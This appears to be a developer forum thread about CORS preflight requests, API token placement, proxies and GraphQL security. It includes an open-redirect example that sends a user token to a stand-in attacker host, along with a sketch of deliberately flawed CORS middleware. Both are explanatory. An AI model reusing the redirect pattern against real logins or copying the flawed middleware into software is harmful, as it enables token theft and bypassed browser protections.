> In terms of security, all API calls should be using https and there is little difference in putting the token in headers or as part of the query string.
Mostly true. But as a heads up, you might want to shy away from this as plenty of browser extensions are actually spyware and report full URLs back to the mothership. We ran into this recently where calls to our service including API keys in the query parameters ended up being reported back -- our customers were testing our API by calling it in the browser. Some kind of extension(s) was reporting it to a service that finds popular URLs on a given domain.
Headers aren't much more secure if someone is trying to steal data, but analytics providers/url aggregators don't care about some arbitrary header.
Our solution has been to push users to use headers and offer mutual auth (client certificates). At least with mutual auth, there isn't a trivially-leakable shared secret, but it does require more sophisticated automation (or a gateway/proxy) for clients to manage.
I wish browser vendors would put work into making the browser-managed client certificate UX much nicer. That would make it possible to offer a real step change in security.
FWIW, if it clarifies things, we disable shared secret auth when enabling mutual auth. At that point, you can really only call it with curl or your application.
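For reference, hitting such an endpoint from curl just takes a couple of extra flags (file names and URL are illustrative):

```
curl --cert client.crt --key client.key https://api.example.com/v1/things
```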
I'm not sure I follow. If you can use it from curl (presumably by passing the client certificate) couldn't you also use it from a browser? The browser has client certificate infrastructure, surely it can use it when making ajax requests?
You can, it just requires you to import the cert and use some pretty gnarly UI. I didn't mean to imply you couldn't use it from the browser, just that it was much less likely than curl + we rely on the cert for figuring out your account and not an API key.
Right, which ties back into my original point. I bet there are devs using the less secure interface right now because it was easier to test in the browser that way. Good UX for certificate management in browsers would make a lot of the web more secure.
If your token is invalidated and regenerated after every request, this mitigates the impact of a leaked token (unless the browser extension intercepts your call and uses the token immediately... at which point your user has other problems to worry about!)
https://github.com/lynndylanhurley/devise_token_auth#about-t... has a good example of this. It's nontrivial for either clients or servers to implement (the edge cases around overlapping requests require careful thought), but it would likely solve this scenario.
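A minimal sketch of the client side of such a scheme, assuming the server returns the replacement token in a response header (the header name and storage choice here are illustrative, not necessarily what devise_token_auth uses):

```javascript
let accessToken = sessionStorage.getItem('access-token');

async function apiFetch(path, options = {}) {
  const res = await fetch(path, {
    ...options,
    headers: { ...(options.headers || {}), 'access-token': accessToken },
  });
  // The server invalidates the token it just saw and issues a fresh one.
  // Overlapping requests are the hard part: you may need to queue calls,
  // or have the server tolerate the previous token for a short window.
  const next = res.headers.get('access-token');
  if (next) {
    accessToken = next;
    sessionStorage.setItem('access-token', accessToken);
  }
  return res;
}
```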
> we had to deal with making CORS requests from app.example.com to api.example.com
What? If you share the same domain but a different subdomain, then just set the document.domain property[1] so they trust each other and be done with it. You don't even need CORS...
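For anyone who hasn't seen the technique, a sketch (the bridge page is hypothetical, and both pages have to opt in by setting document.domain):

```javascript
// Run this on the app.example.com page AND inside a small page served
// from api.example.com (a "bridge" loaded in an iframe):
document.domain = 'example.com';

// The app page can now script the api.example.com iframe directly and
// issue XHRs from that frame's origin -- no CORS involved:
const frame = document.createElement('iframe');
frame.src = 'https://api.example.com/bridge.html'; // hypothetical bridge page
frame.onload = function () {
  const xhr = new frame.contentWindow.XMLHttpRequest();
  xhr.open('GET', 'https://api.example.com/v1/things'); // hypothetical endpoint
  xhr.onload = () => console.log(xhr.responseText);
  xhr.send();
};
document.body.appendChild(frame);
```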
Alternatively, set up a proxy to keep everything behind the same domain. This is typically a best practice.
> In our case, since each CORs request makes a preflight check, it doubles this significant latency without adding any value.
Considering a preflight exchange carries no body and requires no processing beyond asking what the client can and cannot do, it seems odd that this would always "double" the latency here.
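For context, the preflight is a single OPTIONS round trip whose result the browser can cache, something like:

```
OPTIONS /v1/things HTTP/1.1
Host: api.example.com
Origin: https://app.example.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type

HTTP/1.1 204 No Content
Access-Control-Allow-Origin: https://app.example.com
Access-Control-Allow-Methods: POST
Access-Control-Allow-Headers: content-type
Access-Control-Max-Age: 86400
```

With Access-Control-Max-Age set, the preflight is skipped for subsequent matching requests to the same URL (browsers cap how long they honor it), so the "doubling" really only applies to the first request.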
> After reading a great blog post and MDN’s CORS docs I realized there are circumstances where the browser does not make a preflight request, if conditions are met
Okay this is scaring me. Where are we going with this?
> In terms of security, all API calls should be using https and there is little difference in putting the token in headers or as part of the query string.
Yeah, I was afraid of that. Please don't do this, especially if you use that URL in any way to give the user access to a link (e.g. downloading a file), because now it's part of their browser history and they can't completely log out.
> Thanks for reading this! I hope it helped, even if the conclusion is “preflight requests are too troublesome, I’m going proxy” :)
A proxy is the correct solution. Not this horrible hack fest of completely disregarding important HTTP headers. Sigh
Even more so, please avoid the expensive TLS setup round trips to two different hosts. That's probably 2x as expensive as a single preflight request for non-resuming sessions.
As parent states: a simple reverse proxy is probably the way to go here. Takes about 3 lines in nginx.
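Something like this, assuming nginx is already serving the app (names and paths are illustrative):

```nginx
server {
    listen 443 ssl;
    server_name app.example.com;

    # Serve the SPA as before...
    location / {
        root /var/www/app;
    }

    # ...and expose the API under the same origin, so CORS never comes up.
    # The trailing slash on proxy_pass strips the /api/ prefix.
    location /api/ {
        proxy_pass https://api.example.com/;
        proxy_set_header Host api.example.com;
    }
}
```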
> After reading a great blog post and MDN’s CORS docs I realized there are circumstances where the browser does not make a preflight request, if conditions are met
I must say I was a bit surprised that some POST requests can be executed without verifying CORS. There must be a bunch of POST endpoints out there that do have side-effects based on the cookie value, even without a body. The distinction in behaviour between JSON and form encoding is pretty bizarre imo.
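Concretely, these two cross-origin POSTs behave differently -- only the second triggers an OPTIONS preflight (URL is illustrative):

```javascript
// "Simple" request: form encoding is on the CORS whitelist, so the browser
// fires the POST immediately; your endpoint runs its side-effects even if
// the response is later withheld from the calling page.
fetch('https://api.example.com/things', {
  method: 'POST',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  body: 'name=widget',
});

// Not simple: application/json forces a preflight OPTIONS request first.
fetch('https://api.example.com/things', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ name: 'widget' }),
});
```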
I'd still recommend setting up a proxy that serves the api as app.your.co/api/. Dealing with CORS is just very troublesome and a complete waste of time.
This 1000x. While for some specific use cases it's important, trying to leverage CORS for multiple backend systems that are under your control is not worth the hassle.
Everyone here is focusing on their strange app choices (which is fine) but the meat of the article is useful:
* Avoid setting a Content-Type on GET requests.
* If you're using HTTPS exclusively, then custom headers for session auth are generally not needed, so you can avoid those headers in GETs and POSTs as well (see the sketch below).
* If you can get away with POSTing form-style vars rather than JSON, you'll avoid CORS issues too.
The rest of the article is honestly a bit pointless showboating of their app for no reason (and shows some rather poor practice, not to mention the author being surprised by how CORS works in 2016...), but those are the takeaways.
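Putting the first two takeaways together, a cross-origin GET that dodges the preflight looks something like this (URL is illustrative):

```javascript
// No Content-Type and no custom auth header, so this stays a "simple"
// request with no OPTIONS round trip. The session rides on the cookie;
// the server still has to answer with Access-Control-Allow-Credentials
// and an explicit Access-Control-Allow-Origin for the response to be readable.
fetch('https://api.example.com/things?limit=10', {
  method: 'GET',
  credentials: 'include',
});
```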
2016 would be the rise of GraphQL and Falcor backends, where you write exactly what you are looking for on the frontend and send that query to the backend, instead of using REST endpoints.
This is a pretty neat idea. It seems like it would be a lot harder to reason about than REST endpoints.
I'm particularly thinking about validation (beyond the type-level, like when other data could conflict with a change) and security issues. What kinds of techniques are used to approach these concerns?
Both examples seem to be completely JavaScript-centric on the server side, but it seems like there's no reason it shouldn't work with different backend languages.
GraphQL servers exist in multiple languages, many of them more mature than the reference (JavaScript) server. Sangria (the Scala implementation) is particularly impressive, and one of the Elixir implementations, Absinthe, is coming along very nicely.
The main security concerns are:
* Data leakage, the GraphQL schema reveals the overall capabilities of your system, which may not be desirable. It may still be necessary to split into private/public implementations.
* Denial-of-service. Unless you take steps to mitigate it (there are a few approaches out there), it's often trivial to construct a query that could bring down a server. The two main approaches I've seen are whitelisting queries at build time (so clients can't construct arbitrary queries), and adding cost/complexity heuristics to the server and rejecting any query over a certain threshold (see the sketch after this list).
* Authentication. Not actually a new concern, because the issue is basically the same as with REST. But you do need to get authentication and permissioning properly designed on the backend, it's not something you can really defer until a later date.
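For the cost/complexity approach, a crude depth limiter is only a few lines on top of the reference parser (the threshold and query shape are illustrative):

```javascript
const { parse } = require('graphql');

// Walk the parsed query and find the deepest nested selection set.
function maxDepth(node, depth = 0) {
  if (!node.selectionSet) return depth;
  return Math.max(
    ...node.selectionSet.selections.map((sel) => maxDepth(sel, depth + 1))
  );
}

function assertQueryAllowed(query, limit) {
  for (const def of parse(query).definitions) {
    if (maxDepth(def) > limit) {
      throw new Error('Query exceeds maximum depth, rejecting');
    }
  }
}

// A deliberately nested query an attacker might send:
assertQueryAllowed('{ user { friends { friends { friends { name } } } } }', 3);
// -> throws
```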
Another symptom of how rotten the JavaScript ecosystem is. If I'm picking a technology stack for a business, I want to pick one that will last me 10 years.
> If I'm picking a technology stack for a business, I want to pick one that will last me 10 years.
What? Why wouldn't JavaScript last you 10 years? It's been around for over 20 years already and is certainly not going anywhere...
You don't have to upgrade to the newest fad every 6 months like you seem to imply. Most modern languages have crazy fads (just maybe not as fast-moving as JavaScript's), and no one jumps on them every single time they're released; why would JavaScript be different?
When I started going down the whole CORS rabbit hole, a very simple solution came to me almost immediately via googling: Xdomain. It is simple, it doesn't do preflight checks, and it's secure. The only silly edge cases are where other people have already worked around CORS awfulness for their client libraries (MixPanel, FB SDK, Intercom).
> 1. Find a way to proxy requests so that there’s no CORS
Turns out this is really, really easy.
I tried this recently on a cookie-authenticated web api (after discovering that CORS cookies are useless because mobile Safari will always block them).
I'm never touching CORS again unless it's blasting out a bunch of '*' Access-Control-Whatevers on a public API.
I personally always thought that the CORS domain checking was needlessly restrictive.
I can understand entirely different top-level domains; definitely 100% necessary.
You start to lose me at different sub-domains for the same top-level domain. Do we really need to check api.example.com from app.example.com? Chances are good that they're both controlled by the same entity, so what's the problem?
I'm out the door and around the corner when it gets down to the port number of the host. So now two requests that should resolve to the same machine need a CORS check? I think MS did right in having IE ignore the port in CORS domain checks. Not sure whether Edge does.
> Do we really need to check api.example.com from app.example.com?
Sure. What about hosted subdomains where people can create their own sites, with JS, on different subdomains? CORS can't work without applying the most restrictive policy by default -- if you do care about these things being able to access each other, send Access-Control headers.
So rely on proactive work by various SaaS vendors/other domain owners to preserve security for some of their clients, rather than relying on well-defined action from the owners of a particular service to ensure that said service works at all? Seems like we're "failing open" with the policy you suggest?
That's not yet used by all browsers. And it's a bit more restrictive than necessary, since the base domain is supposed to not be a website at all (and loses the ability to do some things with cookies iirc). That's not always the case. co.uk doesn't need to set cookies, but blogspot.com does (and is a website), so .blogspot.com can't be an eTLD.
Super minor, but unless I'm mistaken SPA stands for "Single Page Application", so the first sentence in the post is a bit jarring:
> AlphaSights’ recruitment platform evolved from a Rails application into a _classic SPA app_.
Update 20s later: is "Wepack" in the diagram supposed to be "Webpack"?
Update 60s later: Can you explain _what_ you're actually using that runs into CORS issues? Are browsers talking to the api.* address directly? The diagram seems to imply that all api.* communication is routed through app.*, in which case CORS wouldn't be an issue, right?
> Wow, my first thought was “headers are messy and this is so restrictive”. As a lazy developer, I’ve shied away from dealing with headers, relying on abstractions provided by libraries and frameworks.
I'm sure this is a common thought, but oh man it hurts me to read it.
The whole thing hurts to read. It could only hurt more if he were to discover, at the same time, that there are in fact other verbs than GET and POST.
The diagram is bad, the browser is running code loaded on app.* and making requests to api.*; I've used similar setups and have run into the same issues the author is describing.
I was running into a CORS-related issue, and was thinking of a possible solution:
If it were possible to make "cookie-less" AJAX requests to things like APIs, would it be safe for those requests to bypass CORS? My impression is that the cookie sending is the main danger, and if we could opt-out, then the "use API with provided key" use-case could work independent of what the destination site wants.
I don't know if there's a "spec" for CORS rules though...
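For what it's worth, the cookie-less half already exists -- it's only the CORS bypass that doesn't (a sketch; URL and key are illustrative):

```javascript
const apiKey = 'YOUR-API-KEY';

// fetch can refuse to attach cookies to a cross-origin call:
fetch('https://api.example.com/things', {
  credentials: 'omit', // no cookies sent or stored
  headers: { Authorization: 'Bearer ' + apiKey },
});
// The browser still enforces CORS on this, though -- and the Authorization
// header above is itself enough to trigger a preflight.
```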
FYI, Safari on iOS will never send cookies cross-domain, regardless of how you configure the server or call your XmlHttpRequest (the user can enable 3rd-party cookies in Settings, but literally nobody will ever do this).
Sounds like they're hosted entirely on Heroku and didn't want to go through the effort of adding external infrastructure. But I just found out that apparently you can host Nginx on Heroku [1], which is neat but looks a bit sketchy.
I think it's super important to understand that removing the preflight request practically kills the security measures of CORS. With no preflight request, the browser has no idea whether it can make a request until it already has, at which point it can only restrict access to the contents of the response.
The reason 'simple' and 'unsimple' requests exist is that simple requests are just normal XHR requests, and it would be infeasible to change all the web standards to prevent something that has been in use for years.
Tokens in URLs is a very different, and perhaps drastically more insecure, pattern than tokens in headers. The primary issue is that it is extremely common to do something like this (a sketch; endpoint and parameter names are hypothetical):
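```
# Hand the token back by redirecting to a caller-supplied URL:
GET https://example.com/login?return_to=https://app.example.com/home
 -> 302 Location: https://app.example.com/home?token=SECRET

# With an open redirect, the attacker simply supplies the destination:
GET https://example.com/login?return_to=https://evil.example.net/collect
 -> 302 Location: https://evil.example.net/collect?token=SECRET
```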
Assuming you have an open redirect flaw in your login system (extremely common), I can now exfiltrate user authorization tokens to my own server.
Setting Content-Type to text/plain works, but doing this kind of fiddling is pretty scary. If your Content-Type ends up as XML or HTML, you've just opened up your site for global XSS.
> The browser does not make an OPTIONS request, the server with awareness can potentially not allow the request. Web frameworks don’t do this because in lieu of better security measures, such as CSRF or using sessionless authentication.
If I'm understanding it right, you're saying that if configured correctly, the server can decide not to return information when the CORS rules are not met. To my knowledge, this is a misunderstanding of how CORS works. Once you realise that CORS is meant to be a static, cacheable set of headers dedicated to a specific endpoint, it makes a lot more sense.
With CORS, it is the browser which decides whether a request can go through, having been informed by the CORS headers of what restrictions are placed on making requests to that endpoint.
This misunderstanding can become ugly when combined with the 'fail early' pattern, as I've seen in several popular libraries during my research. The CORS-aware middleware sends rules to the browser as it validates them, and exits prematurely if one fails. If an earlier CORS rule is purposely failed by an attacker during a preflight request, the middleware will not send all the CORS headers, allowing subsequent requests with fewer / zero restrictions.
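A sketch of that flawed shape (Express-style; isWhitelisted is a stand-in, and this is not any specific library's code):

```javascript
const express = require('express');
const app = express();

// Stand-in for the library's real per-rule validation.
function isWhitelisted(headerList) {
  return headerList
    .split(',')
    .every((h) => ['content-type'].includes(h.trim().toLowerCase()));
}

app.use(function corsMiddleware(req, res, next) {
  // Headers are written as each rule passes...
  res.setHeader('Access-Control-Allow-Origin', '*');

  const asked = req.headers['access-control-request-headers'];
  if (asked && !isWhitelisted(asked)) {
    return res.end(); // ...but a failing rule exits early, so the headers
  }                   // below are never evaluated or sent for this preflight.
  res.setHeader('Access-Control-Allow-Headers', asked || '');
  res.setHeader('Access-Control-Allow-Methods', 'GET, POST');
  next();
});
```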